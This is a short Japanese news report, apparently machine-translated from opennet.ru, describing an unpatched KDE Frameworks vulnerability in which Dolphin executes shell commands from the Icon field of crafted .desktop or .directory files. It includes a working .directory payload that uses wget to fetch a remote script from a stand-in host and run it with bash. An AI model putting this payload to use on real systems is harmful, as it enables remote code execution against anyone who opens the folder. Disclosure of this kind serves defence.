ファイルのリストを表示するときに KDE コードが実行される脆弱性

KDE で 特定された 脆弱性これにより、ユーザーが特別に設計された「.desktop」および「.directory」ファイルを含むディレクトリまたはアーカイブを表示したときに、攻撃者が任意のコマンドを実行することができます。攻撃では、ユーザーが Dolphin ファイル マネージャーでファイルのリストを表示するか、悪意のあるデスクトップ ファイルをダウンロードするか、ショートカットをデスクトップまたはドキュメントにドラッグするだけで済みます。この問題は、ライブラリの現在のリリースで明らかになります。 KDEフレームワーク5.60.0 KDE 4 までの古いバージョン。脆弱性は依然として存在します。 残る 未修正 (CVE は割り当てられていません)。

この問題は、KDesktopFile クラスの不正な実装が原因で発生します。このクラスは、「Icon」変数を処理するときに、適切なエスケープ処理を行わずに値を KConfigPrivate::expandString() 関数に渡します。この関数は、処理を含むシェル特殊文字の拡張を実行します。実行するコマンドとして文字列「$(..)」を指定します。 XDG 仕様の要件に反して、実装 開示 シェル構造は、設定のタイプを分離せずに生成されます。起動するアプリケーションのコマンドラインを決定するときだけでなく、デフォルトで表示されるアイコンを指定するときも同様です。

たとえば、攻撃するには 十分な 次のような「.directory」ファイルを含むディレクトリを含む zip アーカイブをユーザーに送信します。

[デスクトップ入力] タイプ=ディレクトリ
アイコン[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

Dolphin ファイル マネージャーでアーカイブの内容を表示しようとすると、スクリプト https://example.com/FILENAME.sh がダウンロードされ、実行されます。


出所: オープンネット.ru

コメントを追加します